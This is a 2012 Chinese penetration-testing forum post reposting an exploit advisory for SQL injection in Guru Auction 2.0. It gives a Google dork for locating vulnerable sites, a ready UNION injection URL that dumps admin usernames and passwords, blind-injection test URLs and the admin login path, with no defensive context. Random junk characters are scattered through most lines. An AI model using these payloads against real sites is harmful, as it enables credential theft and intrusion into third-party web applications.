中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]
作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities' O% Y# Z6 Y# s# B5 u+ [$ w
- s0 I4 K0 e1 x! J
作者     : v3n0m- K& ]4 N$ V# I/ P6 K3 r
应用 : Guru Auction 2.0
1 R6 F" w( c! G6 [4 jPrice       : $49
" l8 e: g. t- F1 AVendor      : http://www.guruscript.com/
. C/ _6 d9 h, p. P0 NGoogle Dork : inurl:subcat.php?cate_id=
1 i( v6 W/ `6 S$ Z7 M" G* x , k) H! S6 h9 l2 R$ }7 }3 N0 P/ h
SQLi p0c:
2 w" a7 W$ J% ]( K4 I2 s~~~~~~~~~~7 B$ A; ]$ ?$ v7 w( a
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
1 F; R5 ~# g! u! V+ S, K, X  C
% H; F/ _( h) ]7 m( f
. b; I& B. a- F盲注 p0c:
) {$ a5 }# H! }& B7 w( a~~~~~~~~~~6 j: w* l+ M+ S5 P2 z
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
4 P3 O* f; e  ^4 o) shttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false0 t! b( W" b( g5 l

. B/ Q( V) p8 [3 J2 Z管理登录入口:' P: F1 N, B- V3 o8 @& m& p
~~~~~~~~~~
7 e! G% q- ^- a1 r; D1 ^http://domain.tld/[path]/admin/
! T2 {: S5 \* ?! o1 U



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2